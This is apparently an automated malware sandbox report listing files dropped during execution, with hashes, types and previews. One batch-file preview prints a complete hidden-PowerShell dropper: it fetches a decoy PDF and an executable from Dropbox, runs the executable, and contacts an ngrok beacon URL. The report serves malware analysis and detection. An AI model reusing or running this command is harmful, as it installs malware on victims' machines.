                                                                                                                                                                                                                                                                                  SHA-256:90E81CEA78D8C1721F9196F37B1757C384EB042255A19317D55DFCAB1854955C
                                                                                                                                                                                                                                                                                  SHA-512:2E9BC13064648AA78FB2D23999E3C6A0E7331597E545D3C1176684BDDFBEACBD6D259A6F6BB6472E318E728B5719A6E2DC43282C41F3CB126A6385B806806451
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8491657806226436
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxLixl9Il8uOVGtJ8Pl7bCtjpdG2UhLtd1rc:mfYkEtJ8PsQ2b
                                                                                                                                                                                                                                                                                  MD5:27150F78AE262BEC8428F379ACB6240B
                                                                                                                                                                                                                                                                                  SHA1:017B202484C4A57C0D79EFFB7CEDA409D5E7E829
                                                                                                                                                                                                                                                                                  SHA-256:B95C2466C35D175F85345069A3E4BC206E720F5B664E130CF4C3194950C6D4F7
                                                                                                                                                                                                                                                                                  SHA-512:A1C5A7C68AFD20124F8E3474DCF9F12609448632D3C227A70697AF9878761DE120C76B98AA95C12DDFEA10A111A45C584B1CC243E75208B5D0D391740D934D85
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9970227376418976
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:hYk3tGzs11tkI0XArZkjblMb2Dgv2YNI6PxzZOB:hz3Iw50XArwYhvLy
                                                                                                                                                                                                                                                                                  MD5:F2CE353B4DD0FE6B3DB543B2B980609B
                                                                                                                                                                                                                                                                                  SHA1:9826BEF89719BEECBEF95084BACA358553AEDC9C
                                                                                                                                                                                                                                                                                  SHA-256:70AF78608EB8DF3037B8A0CAB4C18F32E9811398DAC25789C1638315A7547227
                                                                                                                                                                                                                                                                                  SHA-512:D0D641F234D5FF187C085E221BD47B18A63D322ABAF52C778375AF69A9B2D6B476AE595A68B2925BDF76FA8D57B42DBC948AECBB70E7B24AD2DDEF00A9334C06
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:."./.U.B.3.C.C.t.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.n.i.s.C.c.U.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9080647984944825
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xCHxl9Il8uOVHga0lNVXuc8DUWhiXxZVdD2CkgE/xY/YBd/vc:aSYkJ01X98IWMtkg6xY9
                                                                                                                                                                                                                                                                                  MD5:AA70D33B88426A901E97DCA61C49F735
                                                                                                                                                                                                                                                                                  SHA1:17B6B05E5175A8B0794660C1B6F4F9E01550471D
                                                                                                                                                                                                                                                                                  SHA-256:398CC667FBD150E15D08BE3B9DD1EE4CF63A37D31520829685407734E63A4915
                                                                                                                                                                                                                                                                                  SHA-512:2B59669B40ECEA673D537D2F5EAFF9B3ACDC5B1A02B70F1FD4E6DA9338D9C45718D276B7EED967DA308D673C2356C51D7AD5339B1A5A7152D201EE69A6FFA455
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".j.t.s.5.O.f.x.p.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.n.i.s.C.c.U.
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):61147
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.077943793919534
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
                                                                                                                                                                                                                                                                                  MD5:95B7548D8D8DDBAB0877BFC7F500503D
                                                                                                                                                                                                                                                                                  SHA1:894B9735A30AE067FF88622B4F9C8EDF36997F6F
                                                                                                                                                                                                                                                                                  SHA-256:D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
                                                                                                                                                                                                                                                                                  SHA-512:B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                                                                                                                                                                                                                                  MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                                                                                                                                                                                                                                  SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                                                                                                                                                                                                                                  SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                                                                                                                                                                                                                                  SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):106848
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                  MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                  SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                  SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                  SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with very long lines (566), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):626
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.644927351164377
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:0G81kFX0b11JkdhdEBfH1MRdEFvtyJkP1i3sQBvg2WEo721:0GpObJQEF+YCJaf2WEou
                                                                                                                                                                                                                                                                                  MD5:028FD1C39D3EDF59E76E41CBBB848C3E
                                                                                                                                                                                                                                                                                  SHA1:3AFAEEE8B81DD95405D227B166C7A83BD3DB4E2C
                                                                                                                                                                                                                                                                                  SHA-256:11E04A85AC78FAACE8EE9353B2F5343C23BAB9FAD0A3994D34F91D3BE14A97E6
                                                                                                                                                                                                                                                                                  SHA-512:7C25F92D223037230A1E93A38437D6D5405796C3744C4B18640363DF133BEE7F0AE186C357FF2F6C6B660D71E9EAAD6B84AA969556F80828DD7165F8B8D65A25
                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                  Preview:@echo off..powershell -WindowStyle Hidden -Command ^.. "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "..exit
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):138356
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                  MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                  SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                  SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                  SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):206855
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.983991878155761
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEIx:l81Lel7E6lEMVo/S01fDpWmEgr
                                                                                                                                                                                                                                                                                  MD5:03E0A41C7EF64C946D818C2F5E4B7EC3
                                                                                                                                                                                                                                                                                  SHA1:B3FEB76961D6A54EB9566EAC7E688BC55394B672
                                                                                                                                                                                                                                                                                  SHA-256:CA2E03394F3B161D3A1E25F6A77B28EFDAB1D7989A0A1C2B6FC1764D8C27B7C7
                                                                                                                                                                                                                                                                                  SHA-512:3F775790206CADE3A9CFBDCC3C081611330D525222D43085749A98D975B779109DF305799C53386E4B251D1D892735F5B4B31E6CD95475D0606BDD13BDB24001
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 204 x 264, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):437259
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998726360451669
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:12288:KhTi9JPNfgBTIxXL2v6YRl5JCqqpRFW0X2yk:is1IBTI9LkhSqqQ0Xq
                                                                                                                                                                                                                                                                                  MD5:4B7767FA72167423F71E98AE4633E43A
                                                                                                                                                                                                                                                                                  SHA1:D71092D94EAC383161F072A659558FCF6C9074D5
                                                                                                                                                                                                                                                                                  SHA-256:F8C25539693DCCF13761F8EBFABACF2BA95DCA3C1807F35074F5247F00927B46
                                                                                                                                                                                                                                                                                  SHA-512:6E72EFE5C92C685C4EA011D39982C0D5F86DFA1239C0891EA7E5FF8D6FD5BD04C07C1484B54FA7F35DAD99FB208BD27C8BC66832E6FAB59D8DE2BB9576BC4FE8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1843712
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.178746640907945
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:49152:jgroExwGqf9gSdRye+kwlwW5maKlkvKNeEK4V0:sroExTk9gSdkt
                                                                                                                                                                                                                                                                                  MD5:EB40135D3E0FE985A9E09970DC09A499
                                                                                                                                                                                                                                                                                  SHA1:8AF34D2B5006683471BF521745FC08F75E25F5A5
                                                                                                                                                                                                                                                                                  SHA-256:AA0DE67AABBC67EFFDEEF899E9B68E072AA927BFEC1D95202740702615FE06F6
                                                                                                                                                                                                                                                                                  SHA-512:BE9D06812BDF15374EBA53053CE3BF3BE98FA26DC6F0C7361F0458ECAFBE03ABB7840C3A0995843D2CB31316CDDACF74ABD992952F7C9957E83A4455D71FD592
                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                                  • Filename: qxjDerXRGR.lnk, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):353
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.378684220749841
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:YEemM7i56s/uemMNo9hU1xJPxQJjDrwv/uhx7KIQo56s/C:Y/7i56s/lNorU1PPx0Dkv/CxOI/56s/C
                                                                                                                                                                                                                                                                                  MD5:5FC62B62EED49798F01AD5017B0DC6CF
                                                                                                                                                                                                                                                                                  SHA1:DC4DB36F0CE4014B1F9EAE96F9A27C24889BAFB7
                                                                                                                                                                                                                                                                                  SHA-256:CE8424EDEDE6DA3DE965C112A59C8C7B823B13785966F5962EDB7E3072D40BDB
                                                                                                                                                                                                                                                                                  SHA-512:D04A13958599F86DF73CB7EA5D82A0F2CDCB460D5097251C34747E12E68698BF3840795CF480B748275D2A2687900F1E86D3144EBA609ACCB431552940F28E4D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"logTime": "1210/174136", "correlationVector":"n+cQjwx5E4eyHGNSxeAQ3z","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1210/174136", "correlationVector":"A6A14A989F8E4F5CB0D8C801950CD5A9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1210/174137", "correlationVector":"EZciDoBEgMwHN55MxKWyKV","action":"EXTENSION_UPDATER", "result":""}.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41902
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):76319
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.996132588300074
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6w6DLZ8:GdS8scZNzFrMa4M+lK5/nEDd8
                                                                                                                                                                                                                                                                                  MD5:24439F0E82F6A60E541FB2697F02043F
                                                                                                                                                                                                                                                                                  SHA1:E3FAA84B0ED8CDD2268D53A0ECC6F3134D5EBD8F
                                                                                                                                                                                                                                                                                  SHA-256:B24DD5C374F8BB381A48605D183B6590245EE802C65F643632A3BE9BB1F313C5
                                                                                                                                                                                                                                                                                  SHA-512:8FD794657A9F80FDBC2350DC26A2C82DFD82266B934A4472B3319FDB870841C832137D4F5CE41D518859B8B1DA63031C6B7E750D301F87D6ECA45B958B147FCD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
